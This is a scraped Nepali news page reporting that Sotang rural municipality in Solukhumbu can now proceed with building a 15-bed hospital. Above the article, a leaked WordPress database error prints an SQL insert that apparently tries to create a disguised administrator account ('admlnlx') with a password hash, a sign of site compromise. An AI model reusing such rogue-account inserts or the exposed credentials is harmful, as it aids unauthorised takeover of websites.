WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BD8FZJrULl6l4yFj8CxRl9x2F76ztZ0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-12 11:09:16', '', 'admlnlx', 'admlnlx')

सोताङमा अस्पताल निमार्णको लागि बाटो खुल्यो – Gaule Khabar

सोताङमा अस्पताल निमार्णको लागि बाटो खुल्यो

सोताङमा अस्पताल निमार्णको लागि बाटो खुल्यो

काठमाण्डौ । सोलुखुम्बु जिल्लाको सोताङ गाउँपालिकामा १५ शैयाको अस्पताल बनाउने बाटो खुलेको छ ।

प्रत्येक पालिकामा एउटा अस्पताल बनाउने सरकारको योजना अन्तर्गत स्वास्थ्य तथा जनसंख्या मन्त्रालयले सोताङ गाउँपालिकालाई अस्पताल निर्माणका लागि स्वीकृति दिएको थियो तर, अस्पताल निर्माणका लागि भेरिएसन, नक्सापास लगायतका सवै प्रक्रिया नपुगेकाले काम अघि बढ्न सकेको थिएन । गाउँपालिका अध्यक्षको जिम्मेवारी सम्हालेका खिलराज बस्नेतले रोकिएको अस्पताल निर्माणको कामलाई पूनर्जिवित गराएका छन् । बस्नेतले भने, ‘यसअघि नै सवै प्रक्रिया पु¥याएको भए काम अघि बढिसक्ने थियो, प्रक्रिया नै नपुगेर अस्पताल निर्माणको काम रोकिने अवस्थामा थियो तर, अब काम अघि बढ्छ ।’

स्वास्थ्य मन्त्रालय अन्तर्गतको निती योजना तथा अनुगमन महाशाखाले अस्पताल निर्माणका लागि भेरिएसन स्वीकृति दिएको छ ।
यसअघि २०७८ साल जेठ महिनामा नै मन्त्रालयले १८ करोड भन्दा बढि रकम अस्पताल निर्माणका लागि सम्झौता भई निकासा गरेको थियो । तर, काम भने अघि बढ्न सकेको थिएन । लामो समयदेखि अड्किएको अस्पताल निर्माणको काम तत्काल अघि बढाउन पालिका अध्यक्ष बस्नेतले रबिन अजात कम्पनीलाई निर्देशन समेत दिएका छन् । सोही अनुसार ठेक्का लिएको कम्पनीले अस्पताल निर्माणका लागि बाटो खुलेकाले छिट्टै काम अघि बढाउने बताए।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका